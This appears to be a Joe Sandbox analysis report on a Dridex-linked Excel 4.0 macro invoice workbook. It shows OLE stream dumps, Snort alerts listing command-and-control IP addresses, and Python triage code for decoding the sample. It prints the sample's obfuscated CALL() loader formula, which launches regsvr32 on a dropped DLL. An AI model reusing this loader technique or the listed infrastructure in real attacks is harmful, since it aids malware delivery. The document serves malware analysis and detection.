                                                                                                                                 "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"
                                                                                                                                 =RETURN()

                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/338240/sample/INV8073565781-20210111319595.xlsm"

                                                                                                                                Indicators

                                                                                                                                Has Summary Info:False
                                                                                                                                Application Name:unknown
                                                                                                                                Encrypted Document:False
                                                                                                                                Contains Word Document Stream:
                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                Contains Visio Document Stream:
                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                Flash Objects Count:
                                                                                                                                Contains VBA Macros:False

                                                                                                                                Summary

                                                                                                                                Author:
                                                                                                                                Last Saved By:
                                                                                                                                Create Time:2020-12-07T14:38:21Z
                                                                                                                                Last Saved Time:2021-01-11T14:32:26Z
                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                Security:0

                                                                                                                                Document Summary

                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                Company:
                                                                                                                                Contains Dirty Links:false
                                                                                                                                Shared Document:false
                                                                                                                                Changed Hyperlinks:false
                                                                                                                                Application Version:16.0300

                                                                                                                                Streams

                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                                                General
                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                File Type:data
                                                                                                                                Stream Size:115
                                                                                                                                Entropy:4.80096587863
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: f, File Type: data, Stream Size: 178
                                                                                                                                General
                                                                                                                                Stream Path:f
                                                                                                                                File Type:data
                                                                                                                                Stream Size:178
                                                                                                                                Entropy:2.56223021678
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                                                                                                                                Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                General
                                                                                                                                Stream Path:i02/\x1CompObj
                                                                                                                                File Type:data
                                                                                                                                Stream Size:110
                                                                                                                                Entropy:4.63372611993
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i02/f, File Type: data, Stream Size: 40
                                                                                                                                General
                                                                                                                                Stream Path:i02/f
                                                                                                                                File Type:data
                                                                                                                                Stream Size:40
                                                                                                                                Entropy:1.54176014818
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i02/o, File Type: empty, Stream Size: 0
                                                                                                                                General
                                                                                                                                Stream Path:i02/o
                                                                                                                                File Type:empty
                                                                                                                                Stream Size:0
                                                                                                                                Entropy:0.0
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:
                                                                                                                                Data Raw:
                                                                                                                                Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                General
                                                                                                                                Stream Path:i03/\x1CompObj
                                                                                                                                File Type:data
                                                                                                                                Stream Size:110
                                                                                                                                Entropy:4.63372611993
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i03/f, File Type: data, Stream Size: 40
                                                                                                                                General
                                                                                                                                Stream Path:i03/f
                                                                                                                                File Type:data
                                                                                                                                Stream Size:40
                                                                                                                                Entropy:1.90677964945
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Stream Path: i03/o, File Type: empty, Stream Size: 0
                                                                                                                                General
                                                                                                                                Stream Path:i03/o
                                                                                                                                File Type:empty
                                                                                                                                Stream Size:0
                                                                                                                                Entropy:0.0
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:
                                                                                                                                Data Raw:
                                                                                                                                Stream Path: o, File Type: data, Stream Size: 152
                                                                                                                                General
                                                                                                                                Stream Path:o
                                                                                                                                File Type:data
                                                                                                                                Stream Size:152
                                                                                                                                Entropy:2.68720470607
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                                                                                                                                Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                                                                                                                                Stream Path: x, File Type: data, Stream Size: 48
                                                                                                                                General
                                                                                                                                Stream Path:x
                                                                                                                                File Type:data
                                                                                                                                Stream Size:48
                                                                                                                                Entropy:1.42267983198
                                                                                                                                Base64 Encoded:False
                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00
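
The stream listing above gives each \x1CompObj stream as raw bytes next to an entropy figure. As an added example, not part of the report or of any Joe Sandbox tooling, the Python below parses the two CompObj dumps by the [MS-OLEDS] CompObjStream layout (fixed 28-byte header, then length-prefixed ANSI strings for the user type, clipboard format and ProgID, then the optional 0x71B239F4 marker before the Unicode copies) and recomputes the byte entropy the report shows. The hex is copied from the Data Raw fields of the \x1CompObj and i02/\x1CompObj streams; reading the object CLSID out of the header bytes the spec marks reserved is common practice, and the test confirms it holds for this sample.

```python
import math
import struct
import uuid
from collections import Counter

# The two \x01CompObj streams exactly as the report dumps them (115 and 110 bytes).
COMPOBJ_MULTIPAGE = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 "
    "19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 "
    "10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 "
    "12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 "
    "f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00"
)
COMPOBJ_FORM = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f "
    "19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 "
    "10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 "
    "0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 "
    "f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00"
)

UNICODE_MARKER = 0x71B239F4  # optional marker that precedes the Unicode string copies


def _ansi_string(buf: bytes, off: int):
    """LengthPrefixedAnsiString: 4-byte length (including the NUL) then that many bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    if n > len(buf) - off:
        raise ValueError(f"string length {n} runs past the end of the stream")
    return buf[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def parse_compobj(buf: bytes) -> dict:
    """Parse a \\x01CompObj stream into the fields that identify the embedded object."""
    if len(buf) < 28:
        raise ValueError("too short for a CompObjHeader")
    reserved1, version, marker = struct.unpack_from("<III", buf, 0)
    if reserved1 != 0xFFFE0001 or marker != 0xFFFFFFFF:
        raise ValueError("CompObjHeader magic mismatch")
    # Bytes 12..27 are 'reserved' in the spec; in practice (and in this sample) they
    # carry the object's CLSID in the usual little-endian GUID layout.
    clsid = str(uuid.UUID(bytes_le=buf[12:28])).upper()
    off = 28
    user_type, off = _ansi_string(buf, off)
    (fmt,) = struct.unpack_from("<I", buf, off)
    if fmt == 0:                                   # no clipboard format recorded
        clip, off = None, off + 4
    elif fmt in (0xFFFFFFFF, 0xFFFFFFFE):          # a standard CF_* id follows
        (clip,) = struct.unpack_from("<I", buf, off + 4)
        off += 8
    else:                                          # custom format named as a string
        clip, off = _ansi_string(buf, off)
    prog_id, off = _ansi_string(buf, off)          # 'Reserved1' in the spec, the ProgID in practice
    has_unicode = (off + 4 <= len(buf)
                   and struct.unpack_from("<I", buf, off)[0] == UNICODE_MARKER)
    return {"version": version, "clsid": clsid, "user_type": user_type,
            "clipboard_format": clip, "prog_id": prog_id,
            "unicode_section": has_unicode, "bytes_consumed": off}


def shannon_entropy(buf: bytes) -> float:
    """Byte-wise Shannon entropy in bits per byte, the statistic behind the report's Entropy field."""
    n = len(buf)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def describe(buf: bytes) -> str:
    """One-line triage summary: which MSForms object the stream belongs to and how random it looks."""
    p = parse_compobj(buf)
    return (f"{p['prog_id']} clsid={p['clsid']} type={p['user_type']!r} "
            f"entropy={shannon_entropy(buf):.2f}")


if __name__ == "__main__":
    for stream in (COMPOBJ_MULTIPAGE, COMPOBJ_FORM):
        print(describe(stream))
```

The two ProgIDs (Forms.MultiPage.1 and Forms.Form.1) and their CLSIDs are what tell an analyst that the `f`, `o`, `x` and `i02/`, `i03/` streams are MSForms control storage rather than anything that executes on its own; the low entropy of those streams in the listing is consistent with mostly-zero property records rather than packed payload.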

                                                                                                                                Macro 4.0 Code

                                                                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
                                                                                                                                
                                                                                                                                "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

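The Macro 4.0 Code listed here (and identically under the earlier OLE file section) builds every string argument of CALL() from defined names at run time, so a static scan sees only fragments such as "S"…"A", "r"…"gsvr" and "CCCC". As an added example, not part of the report, the Python below resolves such a formula once the name values are known, splits the CALL type string into the declared argument types and flags the launcher-plus-LOLBin pattern. The name-to-value table is an assumption for illustration: the report does not list what the cells hold, so the values are chosen only so that the fragments join into a call consistent with the Regsvr32 Anomaly the report flags, and the DLL path is a placeholder rather than the sample's real drop location.

```python
import ntpath
import re
from typing import Dict, List, Union

# Excel 4.0 CALL() type-string letters (Excel SDK): the first letter is the return
# type, the rest are argument types. J = 32-bit integer, C = NUL-terminated char*.
XLM_TYPES = {"A": "BOOL", "B": "double", "C": "char* (NUL-terminated)",
             "D": "byte-counted string", "F": "char* (in/out)",
             "H": "unsigned short", "I": "short", "J": "long"}

# Parameter names of the launcher APIs this dropper style reaches for.
API_PARAMS = {
    "ShellExecuteA": ["hwnd", "lpOperation", "lpFile", "lpParameters", "lpDirectory", "nShowCmd"],
    "WinExec": ["lpCmdLine", "uCmdShow"],
}
LOLBINS = {"regsvr32", "rundll32", "mshta", "certutil", "wscript", "cscript",
           "powershell", "cmd", "msiexec"}

# ASSUMED defined-name values (the report does not show the cells). Chosen so the
# literal fragments join into a plausible call; the path is a placeholder.
ASSUMED_NAMES = {
    "wegb": "Shell", "o0": "32", "ohgdfww": "hellExecute", "i0": "J",
    "v0": "o", "w00": "e",
    "bb": "C:\\placeholder\\", "ab": "dropped", "ba": ".dll",
}

# The formula as the report prints it, and the same cell as it is stored
# (formula text wrapped in quotes, inner quotes doubled). In the dump the
# stored cell is followed by the next cell, =RETURN(), which is left out here.
FORMULA = ('CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", '
           '"r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)')
CELL = ('"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",'
        '""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"')


def unquote_cell(cell: str) -> str:
    """Turn a cell dumped as a quoted string back into its formula text."""
    cell = cell.strip()
    if len(cell) >= 2 and cell[0] == '"' and cell[-1] == '"':
        cell = cell[1:-1]
    return cell.replace('""', '"')


def _split_top_level(s: str, sep: str) -> List[str]:
    """Split on sep only outside double-quoted strings and outside nested parentheses."""
    parts, buf, depth, in_str, i = [], [], 0, False, 0
    while i < len(s):
        ch = s[i]
        if ch == '"':
            if in_str and s[i + 1:i + 2] == '"':      # doubled quote = escaped quote
                buf.append('""')
                i += 2
                continue
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(buf))
                buf = []
                i += 1
                continue
        buf.append(ch)
        i += 1
    parts.append("".join(buf))
    return [p.strip() for p in parts]


def resolve_expr(expr: str, names: Dict[str, str]) -> Union[str, int]:
    """Evaluate an XLM concatenation: string literals, integers and & joins of defined names."""
    out = []
    for piece in _split_top_level(expr, "&"):
        if len(piece) >= 2 and piece[0] == '"' and piece[-1] == '"':
            out.append(piece[1:-1].replace('""', '"'))
        elif re.fullmatch(r"-?\d+", piece):
            out.append(int(piece))
        elif piece in names:
            out.append(names[piece])
        else:
            raise KeyError(f"unresolved name {piece!r}: add it to the name table")
    return out[0] if len(out) == 1 else "".join(str(x) for x in out)


def decode_call(formula: str, names: Dict[str, str]) -> dict:
    """Resolve =CALL(module, proc, typestring, args...) into concrete, typed values."""
    m = re.fullmatch(r"CALL\((.*)\)", formula.strip().lstrip("="), re.S)
    if not m:
        raise ValueError("not a CALL() formula")
    vals = [resolve_expr(a, names) for a in _split_top_level(m.group(1), ",")]
    module, proc, typestr, args = vals[0], vals[1], str(vals[2]), vals[3:]
    if len(typestr) - 1 != len(args):
        raise ValueError(f"type string {typestr!r} declares {len(typestr) - 1} args, got {len(args)}")
    param_names = API_PARAMS.get(str(proc), [])
    return {
        "module": module,
        "function": proc,
        "returns": XLM_TYPES.get(typestr[0], "?"),
        "arg_types": [XLM_TYPES.get(t, "?") for t in typestr[1:]],
        "args": args,
        "params": dict(zip(param_names, args)) if len(param_names) == len(args) else {},
    }


def is_suspicious(call: dict) -> bool:
    """True when a process-launching API is handed a living-off-the-land binary as its target."""
    launcher = str(call["function"]).lower().startswith(("shellexecute", "winexec", "createprocess"))
    targets = [ntpath.basename(str(a)).lower().split(".")[0] for a in call["args"]]
    return launcher and any(t in LOLBINS for t in targets)


if __name__ == "__main__":
    call = decode_call(unquote_cell(CELL), ASSUMED_NAMES)
    print(call["module"], call["function"], call["params"], "suspicious:", is_suspicious(call))
```

Under the assumed table the type string resolves to JJCCCCJ, which is the signature of a six-argument API returning a long with four string arguments in the middle, and the last resolved argument, nShowCmd, is 0 (SW_HIDE). In a real triage the name table comes from the workbook's defined names and cell values (for example via an XLM emulator) rather than being guessed; the point of the example is that the CALL structure itself, not the name values, is what reveals the API and its argument layout.
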
                                                                                                                                Network Behavior

                                                                                                                                Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/11/21-20:47:41.098543 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49166 | 77.220.64.37 | 192.168.2.22
01/11/21-20:47:43.841294 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49168 | 80.86.91.27 | 192.168.2.22
01/11/21-20:47:44.417159 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49169 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:44.417159 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49169 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:45.534218 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49171 | 77.220.64.37 | 192.168.2.22
01/11/21-20:47:46.052796 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49172 | 80.86.91.27 | 192.168.2.22
01/11/21-20:47:46.620576 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49173 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:46.620576 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49173 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:47.673510 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49175 | 77.220.64.37 | 192.168.2.22
01/11/21-20:47:48.188446 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49176 | 80.86.91.27 | 192.168.2.22
01/11/21-20:47:48.702464 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49177 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:48.702464 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49177 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:49.762134 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49179 | 77.220.64.37 | 192.168.2.22
01/11/21-20:47:50.290166 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49180 | 80.86.91.27 | 192.168.2.22
01/11/21-20:47:50.819433 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49181 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:50.819433 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49181 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:51.899759 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49183 | 77.220.64.37 | 192.168.2.22
01/11/21-20:47:52.422991 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49184 | 80.86.91.27 | 192.168.2.22
01/11/21-20:47:52.940965 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49185 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:52.940965 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49185 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:53.972881 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49187 | 77.220.64.37 | 192.168.2.22
01/11/21-20:47:54.502255 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49188 | 80.86.91.27 | 192.168.2.22
01/11/21-20:47:55.029925 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49189 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:55.029925 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49189 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:56.048129 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49191 | 77.220.64.37 | 192.168.2.22
01/11/21-20:47:56.574966 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49192 | 80.86.91.27 | 192.168.2.22
01/11/21-20:47:57.089881 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49193 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:57.089881 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49193 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:58.141265 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49195 | 77.220.64.37 | 192.168.2.22
01/11/21-20:47:58.663541 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49196 | 80.86.91.27 | 192.168.2.22
01/11/21-20:47:59.236713 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49197 | 5.100.228.233 | 192.168.2.22
01/11/21-20:47:59.236713 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49197 | 5.100.228.233 | 192.168.2.22
01/11/21-20:48:01.461744 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49199 | 77.220.64.37 | 192.168.2.22
01/11/21-20:48:01.990394 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49200 | 80.86.91.27 | 192.168.2.22
01/11/21-20:48:02.572459 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49201 | 5.100.228.233 | 192.168.2.22
01/11/21-20:48:02.572459 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49201 | 5.100.228.233 | 192.168.2.22
01/11/21-20:48:03.625437 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49203 | 77.220.64.37 | 192.168.2.22
01/11/21-20:48:04.154356 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49204 | 80.86.91.27 | 192.168.2.22
01/11/21-20:48:04.694273 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49205 | 5.100.228.233 | 192.168.2.22
01/11/21-20:48:04.694273 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3389 | 49205 | 5.100.228.233 | 192.168.2.22
01/11/21-20:48:05.735890 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49207 | 77.220.64.37 | 192.168.2.22
01/11/21-20:48:06.250458 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3308 | 49208 | 80.86.91.27 | 192.168.2.22
                                                                                                                                01/11/21-20:48:06.773073TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:06.773073TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492095.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:07.828961TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921177.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:08.351383TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921280.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:08.864837TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492135.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:08.864837TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492135.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:09.938128TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921577.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:10.463656TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084921680.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:10.973087TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492175.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:10.973087TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492175.100.228.233192.168.2.22
                                                                                                                                01/11/21-20:48:12.337016TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434921977.220.64.37192.168.2.22
                                                                                                                                01/11/21-20:48:12.856122TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084922080.86.91.27192.168.2.22
                                                                                                                                01/11/21-20:48:13.352687TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492215.100.228.233192.168.2.22
